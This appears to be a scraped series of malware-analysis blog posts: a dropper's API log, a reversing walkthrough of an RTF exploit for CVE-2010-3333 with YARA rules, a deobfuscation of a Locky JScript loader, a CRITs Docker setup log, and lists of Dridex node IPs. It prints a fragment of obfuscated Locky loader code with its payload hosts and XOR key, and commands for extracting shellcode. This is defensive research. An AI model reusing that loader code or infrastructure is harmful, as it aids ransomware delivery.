  • 3418    3536 TCP    C:\Documents and Settings\Administrator\Desktop\dropper[.]exe    
  • 3419    384 TCP    C:\Documents and Settings\Administrator\Desktop\dropper


API Logger (Interesting Calls):

  • 91222     CreateFileA(\\.\NtSecureSys)    
  • 912c6     GetCurrentProcessId()=2688
  • 771bd3a9     connect(69.50.214[.]54:80)

URLs (via GlobalAddAtomA API):
————————————————–
Picture
Picture
RegKeys (Anti-AV Check):
————————————————–

  • SUNBELT SOFTWARE
  • Sunbelt Software
  • G DATA Software
  • CJSC Returnil Software
  • Check Point Software Technologies Ltd
  • Panda Software International
  • FRISK Software International Ltd
  • ALWIL Software
  • SUNBELT SOFTWARE
  • Sunbelt Software
  • G DATA Software
  • CJSC Returnil Software
  • Check Point Software Technologies Ltd
  • Panda Software International
  • FRISK Software International Ltd
  • ALWIL Software

Reversing Malicious RTF Document: MS10-087 Exploit CVE-2010-3333

Image 1: The maldoc titled as “ANCALOG[.]doc” reveals RFT artifacts.
G0al: Practice reverse engineering RFT exploits. In this case, we analyze the infamous exploit for MS10-087 CVE-2010-3333. This exploit was heavily used by various Chinese and Eastern-European APT groups. The sample below was submitted from Poland on June 6, 2016.

I. Malware Sample: ANCALOG[.]doc
 Original Filename       ANCALOG[.]doc
MD5 4483ad299158eb54f6ff58b5346a36ee
SHA-1 7551c2d2c1b3271cecab6fc803626bc3d505aacd
SHA-256 97913941fb149e85d76d82cb19a8045d0cf4f07f7addb91ea94081050e0693b2
ssdeep 48:mdTagznhm11D1Dl8NYYhpWo0FdzMwRH0dgw9h3WEQDT:mxB6VV5o0vH0dJD8T
Size 664.9 KB (680855 bytes)
Type Rich Text Format
Magic Rich Text Format data, version 1, unknown character set
TrID
Rich Text Format (100.0%)

Image 2-3: The list of all contents as it is displated by rtfdump from the RTF maldoc.
Command Sequence:
I. python2.7 rtfdump.py -y rtf.yara 97913941fb149e85d76d82cb19a8045d0cf4f07f7addb91ea94081050e0693b2

Image 4: The maldoc scan by the RTF Yara ruleset reveals various signs of exploitation inside the maldoc.

p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px ‘Andale Mono’; color: #28fe14; background-color: #000000; background-color: rgba(0, 0, 0, 0.9)} span.s1 {font-variant-ligatures: no-common-ligatures}

II. python2.7 rtfdump.py -s 337677 97913941fb149e85d76d82cb19a8045d0cf4f07f7addb91ea94081050e0693b2 

Image 5: The rftdump script reveals the encoded payload inside the maldoc.

p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px ‘Andale Mono’; color: #28fe14; background-color: #000000; background-color: rgba(0, 0, 0, 0.9)} span.s1 {font-variant-ligatures: no-common-ligatures}

III. python2.7 rtfdump.py -s 338677 -H ../97913941fb149e85d76d82cb19a8045d0cf4f07f7addb91ea94081050e0693b2 

Image 6: The hexidecimal decoded values reveal six sequential NOP calls (often used to setup the stage for exploits) at “0x35” and the “cmd” script in the end.

p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px ‘Andale Mono’; color: #28fe14; background-color: #000000; background-color: rgba(0, 0, 0, 0.9)} span.s1 {font-variant-ligatures: no-common-ligatures}

IV.python2.7 rtfdump.py -s 338677 -H -c “0x35:” -d ../97913941fb149e85d76d82cb19a8045d0cf4f07f7addb91ea94081050e0693b2 > shellcode.bin

Yara RTF Maldoc Signature:
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px ‘Andale Mono’; color: #28fe14; background-color: #000000; background-color: rgba(0, 0, 0, 0.9)} p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px ‘Andale Mono’; color: #28fe14; background-color: #000000; background-color: rgba(0, 0, 0, 0.9); min-height: 14.0px} span.s1 {font-variant-ligatures: no-common-ligatures}

rule includepicture_http
{
    meta:
        author = “Didier Stevens (https://DidierStevens.com)”
    strings:
        $a1 = “INCLUDEPICTURE”
        $a2 = “http” nocase
    condition:
        $a1 and $a2
}
// https://securelist.com/analysis/publications/37158/the-curious-case-of-a-cve-2012-0158-exploit/
rule ListView2_CLSID
{
    meta:
        author = “Didier Stevens (https://DidierStevens.com)”
    strings:
        $a1 = {4B F0 D1 BD 8B 85 D1 11 B1 6A 00 C0 F0 28 36 28}
    condition:
        any of them
}
rule http
{
    meta:
        author = “Didier Stevens (https://DidierStevens.com)”
    strings:
        $a1 = “http” nocase
    condition:
        $a1
}
rule RTF_Object
{
    meta:
        author = “Didier Stevens (https://DidierStevens.com)”
    strings:
        $a1 = {01 05 00 00 02 00 00 00}
    condition:
        any of them
}
rule pFragments
{
    meta:
        author = “Didier Stevens (https://DidierStevens.com)”
    strings:
        $a1 = “pFragments”
    condition:
        $a1
}

p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px ‘Andale Mono’; color: #28fe14; background-color: #000000; background-color: rgba(0, 0, 0, 0.9)} span.s1 {font-variant-ligatures: no-common-ligatures}

Trojan-Downloader:JS/Locky: Deobfuscate and Extract IOCs

Source: https://www.flashpoint-intel.com/anatomy-locky-zepto-ransomware/
Goal: Assist analysts with decoding and obtain relevant information from Locky HTA Application (HTA) and Windows Script File (WSF) JSCRIPT loaders.

GitHub repohttps://github.com/vkremez/Locky/blob/master/README.md

Locky ransomware was notorious for its usage of the second-stage JavaScript and Windows Script File JSCRIPT in its spray-and-pray attacks.

These are classic simple XOR-ed .wsf/.hta SCRIPT payloads used by this gang.

For example, let’s take a look at the following Locky HTA JSCRIPT loader:
  • 3d91a6ffed8b038363a0ead0f8985d1bdf88ba543aff0bcab048819d70455073.jscript.

Padding word:
  • LICIZAX
XOR Key:
  • b6vYxEjsTYwJ7mIrZz4WFSGHeaddkwbq

Payload URI: (*remove padding word and decode Base64): 
  • goldenladywedding[.]com/vdG76VUY76rjnu?CHhjpz=zhXHhhwS
  • www[.]jmetalloysllp[.]com/vdG76VUY76rjnu?CHhjpz=zhXHhhwS
  • livewebsol[.]com/vdG76VUY76rjnu?CHhjpz=zhXHhhwS
Filename in %TEMP%/AppData/ (launched by rundll32.exe with ‘qwerty’) :

  • NqmXYsBdh[.]dll
Here is the relevant function right below the eval() one:

var brigadabrigadalalapolicMOTALO2HORDA17 = “NqmXYsBdh”;var brigadabrigadalalapolicTRAxKey = brigadabrigadalalapolicMOTALO2fsta(“b6vYxEjsTYwJ7mIrZz4WFSGHeaddkwbq”);var brigadabrigadalalapolicMOTALO2_a5 = [“Z29sZGVubGFkeLICIZAXXdlZGRpbmcuY29tL3ZkRzc2VlVZNzZyam51”,“dLICIZAX3d3LmptZXRhbGxveXNsbHAuYLICIZAX29tL3ZkRzc2VlVZNzZyam51”,“bGl2ZXdlYnNvbC5jb20vdmRHLICIZAXNzZWVVk3NnJqbnU=”]; var brigadabrigadalalapolicMOTALO2HORDAI = 0;for(brigadabrigadalalapolicMOTALO2HORDA5 in brigadabrigadalalapolicMOTALO2_a5){brigadabrigadalalapolicMOTALO2HORDAI++;try{var brigadabrigadalalapolicMOTALO2HORDA6 =brigadabrigadalalapolicMOTALO2_bChosteck.brigadabrigadalalapolicMRADXHO() + brigadabrigadalalapolicMOTALO2_a5[brigadabrigadalalapolicMOTALO2HORDA5].brigadabrigadalalapolicMRADXHO() + “?CHhjpz=zhXHhhwS”;
if(brigadabrigadalalapolicMOTALO2_a2(brigadabrigadalalapolicMOTALO2HORDA6,brigadabrigadalalapolicMOTALO2HORDA17+brigadabrigadalalapolicMOTALO2HORDAI)){
break;

Please take a look at the following GitHub page with the Python script to decode Locky JSCRIPT loaders and obtain payload indicators of compromise:
https://github.com/vkremez/Locky/blob/master/README.md
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; -webkit-text-stroke: #000000} p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; -webkit-text-stroke: #000000; min-height: 12.0px} p.p3 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; color: #d12f1b; -webkit-text-stroke: #d12f1b; min-height: 12.0px} p.p4 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; color: #bb2ca2; -webkit-text-stroke: #bb2ca2; min-height: 12.0px} p.p5 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; color: #d12f1b; -webkit-text-stroke: #d12f1b} p.p6 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; color: #bb2ca2; -webkit-text-stroke: #bb2ca2} li.li1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; -webkit-text-stroke: #000000} span.s1 {font-kerning: none} span.s2 {font-kerning: none; color: #bb2ca2; -webkit-text-stroke: 0px #bb2ca2} span.s3 {font-kerning: none; color: #d12f1b; -webkit-text-stroke: 0px #d12f1b} span.s4 {font-kerning: none; -webkit-text-stroke: 0px #000000} span.s5 {font-kerning: none; color: #272ad8; -webkit-text-stroke: 0px #272ad8} ul.ul1 {list-style-type: disc}

Let’s Learn: Mitre’s Crits Threat Intelligence Platform in Docker

Source: https://crits.github.io/
Requirements: Docker, MongoDB
Docker Imagehttps://hub.docker.com/r/remnux/crits/

I. Install the Crits Threat Intelligence Platform (TIP) image via Kitematic;












II. Verify the container status via Kitematic panel
III. Browse to the local panel that is setup by default on port 8443; and
III. Login using the default credentials
Adendum: Additional Debug Information:

2017-01-17 07:15:17,244 CRIT Set uid to user 999
2017-01-17 07:15:17,307 INFO RPC interface ‘supervisor’ initialized
2017-01-17 07:15:17,309 CRIT Server ‘unix_http_server’ running without any HTTP authentication checking
2017-01-17 07:15:17,309 INFO supervisord started with pid 5
2017-01-17 07:15:18,317 INFO spawned: ‘mongod’ with pid 9
2017-01-17 07:15:18,320 INFO spawned: ‘apache2’ with pid 10
2017-01-17 07:15:19,522 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:15:19,523 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
about to fork child process, waiting until server is ready for connections.
forked process: 86
ERROR: child process failed, exited with error number 48
2017-01-17 07:18:00,443 CRIT Set uid to user 999
Unlinking stale socket /data/run/supervisor.sock
2017-01-17 07:18:01,161 INFO RPC interface ‘supervisor’ initialized
2017-01-17 07:18:01,177 CRIT Server ‘unix_http_server’ running without any HTTP authentication checking
2017-01-17 07:18:01,216 INFO supervisord started with pid 5
2017-01-17 07:18:02,264 INFO spawned: ‘mongod’ with pid 9
2017-01-17 07:18:02,310 INFO spawned: ‘apache2’ with pid 10
2017-01-17 07:18:03,304 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:18:03,439 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:18:03,498 INFO exited: apache2 (exit status 0; expected)
about to fork child process, waiting until server is ready for connections.
forked process: 16
ERROR: child process failed, exited with error number 100
2017-01-17 07:19:03,085 CRIT Set uid to user 999
Unlinking stale socket /data/run/supervisor.sock
about to fork child process, waiting until server is ready for connections.
forked process: 12
2017-01-17 07:19:04,273 INFO RPC interface ‘supervisor’ initialized
2017-01-17 07:19:04,284 CRIT Server ‘unix_http_server’ running without any HTTP authentication checking
2017-01-17 07:19:04,336 INFO supervisord started with pid 5
2017-01-17 07:19:05,373 INFO spawned: ‘mongod’ with pid 15
2017-01-17 07:19:05,429 INFO spawned: ‘apache2’ with pid 16
2017-01-17 07:19:06,378 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:19:06,379 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:19:07,262 INFO spawned: ‘mongod’ with pid 19
2017-01-17 07:19:07,344 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:19:07,459 INFO exited: apache2 (exit status 0; expected)
2017-01-17 07:19:07,927 INFO spawned: ‘apache2’ with pid 22
2017-01-17 07:19:08,031 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:19:08,780 INFO exited: apache2 (exit status 0; not expected)
2017-01-17 07:19:09,879 INFO spawned: ‘mongod’ with pid 23
2017-01-17 07:19:09,892 INFO spawned: ‘apache2’ with pid 24
2017-01-17 07:19:10,579 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:19:10,997 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:19:11,034 INFO exited: apache2 (exit status 0; expected)
2017-01-17 07:19:12,058 INFO spawned: ‘apache2’ with pid 28
2017-01-17 07:19:12,669 INFO spawned: ‘mongod’ with pid 29
2017-01-17 07:19:12,757 INFO exited: apache2 (exit status 0; not expected)
2017-01-17 07:19:13,057 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:19:14,187 INFO spawned: ‘apache2’ with pid 32
child process started successfully, parent exiting
2017-01-17 07:19:15,672 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:19:16,678 INFO spawned: ‘mongod’ with pid 106
2017-01-17 07:19:17,108 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:19:18,115 INFO gave up: mongod entered FATAL state, too many start retries too quickly
Drop protection enabled. Will not drop existing content!
User Roles: added 3 roles!
Actions: added 2 actions!
Raw Data Types: added 2 types!
Signature Types: added 3 types!
Drop protection does not apply to effective TLDs
2017-01-17 07:20:59,999 CRIT Set uid to user 999
Unlinking stale socket /data/run/supervisor.sock
2017-01-17 07:21:00,999 INFO RPC interface ‘supervisor’ initialized
2017-01-17 07:21:01,002 CRIT Server ‘unix_http_server’ running without any HTTP authentication checking
2017-01-17 07:21:01,002 INFO supervisord started with pid 5
about to fork child process, waiting until server is ready for connections.
forked process: 12
2017-01-17 07:21:02,120 INFO spawned: ‘mongod’ with pid 15
2017-01-17 07:21:02,182 INFO spawned: ‘apache2’ with pid 16
2017-01-17 07:21:03,003 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:03,940 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:21:05,182 INFO spawned: ‘mongod’ with pid 21
2017-01-17 07:21:06,356 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:21:06,700 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:07,710 INFO spawned: ‘mongod’ with pid 79
2017-01-17 07:21:08,446 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:09,954 INFO spawned: ‘mongod’ with pid 82
2017-01-17 07:21:10,461 INFO exited: mongod (exit status 100; not expected)
child process started successfully, parent exiting
2017-01-17 07:21:12,476 INFO spawned: ‘mongod’ with pid 100
2017-01-17 07:21:13,709 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-01-17 07:21:13,838 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:14,939 INFO spawned: ‘mongod’ with pid 105
2017-01-17 07:21:15,292 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:16,333 INFO spawned: ‘mongod’ with pid 118
2017-01-17 07:21:16,636 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:18,797 INFO spawned: ‘mongod’ with pid 121
2017-01-17 07:21:19,256 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:22,270 INFO spawned: ‘mongod’ with pid 127
2017-01-17 07:21:22,537 INFO exited: mongod (exit status 100; not expected)
2017-01-17 07:21:23,549 INFO gave up: mongod entered FATAL state, too many start retries too quickly
Drop protection enabled. Will not drop existing content!
User Roles: existing documents detected. skipping!
Actions: existing documents detected. skipping!
Raw Data Types: existing documents detected. skipping!
Signature Types: existing documents detected. skipping!
Drop protection does not apply to effective TLDs
Effective TLDs: added 7789 TLDs!
Drop protection does not apply to location objects
Added 248 Location Objects.
Default Dashboard Created.
Creating a new CRITs configuration.
Creating indexes (duplicates will be ignored automatically)
User ‘nonroot’ created successfully!
Temp password: 
A CRITs configuration already exists. Skipping default creation.
Setting [allowed_hosts] to a value of [[‘localhost’]]
Saving CRITs configuration.
To access CRITS user interface, go https://localhost:8443 and use the following credentials:
Username: nonroot
Password: 
Please change the temporary password upon successful login to the web interface by clicking on ‘Nonroot User’ near the top left panel and selecting ‘Change Password’.
If changes made to the CRITs application require a restart of the web server, run ‘service apache2 stop’ and supervisor will automatically restart the web server for you.

Dridex Banker Statistics 2016-2017


Source: OSINT

Goal: Obtain statistics related to Dridex trends in 2016, including, but not limited to,

  • (1) a count of all known Dridex nodes 
  • (2) top 10 country infrastructure locations; and
  • (3) timeline histogram of node Dridex detections

Tool: Elasticsearch, Kibana, and Logstash (ELK)

Date Range: 2016-2017

Statistics:
(1) Dridex Count: 329
(2) Top 10 Country Infrastructure Location

geoip.country_name.keyword: Descending   Count
United States 77
Germany 34
United Kingdom 28
France 17
Canada 10
Netherlands 9
Australia 8
Russia 8
Thailand 8
Bulgaria 7

(3) Timeline Histogram

Detection Time IOC geoip.country_name
December 26th 2016; 20:07:34 92.222.129.145 France
December 26th 2016; 20:07:34 91.103.2.132 Ireland
December 23rd 2016; 12:35:14 82.196.5.27 Netherlands
December 22nd 2016; 07:27:36 192.188.58.163 Ecuador
December 22nd 2016; 07:27:36 203.153.165.21 Thailand
December 22nd 2016; 07:27:36 109.74.9.119 Sweden
December 22nd 2016; 07:27:36 69.43.168.214 United States
December 17th 2016; 11:27:38 71.6.155.196 United States
December 17th 2016; 11:27:38 188.68.50.34 Germany
December 15th 2016; 08:55:30 212.200.111.170 Serbia
December 12th 2016; 08:21:30 192.241.236.239 United States
December 9th 2016; 05:23:36 188.120.249.30 Russia
November 21st 2016; 06:34:36 72.249.144.95 United States
November 18th 2016; 13:35:55 188.126.72.179 Sweden
November 18th 2016; 05:55:13 174.37.216.226 United States
November 18th 2016; 05:55:13 166.78.144.68 United States
November 16th 2016; 13:54:38 54.235.86.173 United States
November 15th 2016; 09:53:22 193.136.97.4 Portugal
November 15th 2016; 09:53:22 93.122.165.54 Romania
November 11th 2016; 09:09:04 87.254.45.29 Norway
November 11th 2016; 09:09:04 149.210.158.54 Netherlands
November 5th 2016; 17:01:33 216.127.161.5 United States
November 4th 2016; 04:51:51 77.111.90.85 Hungary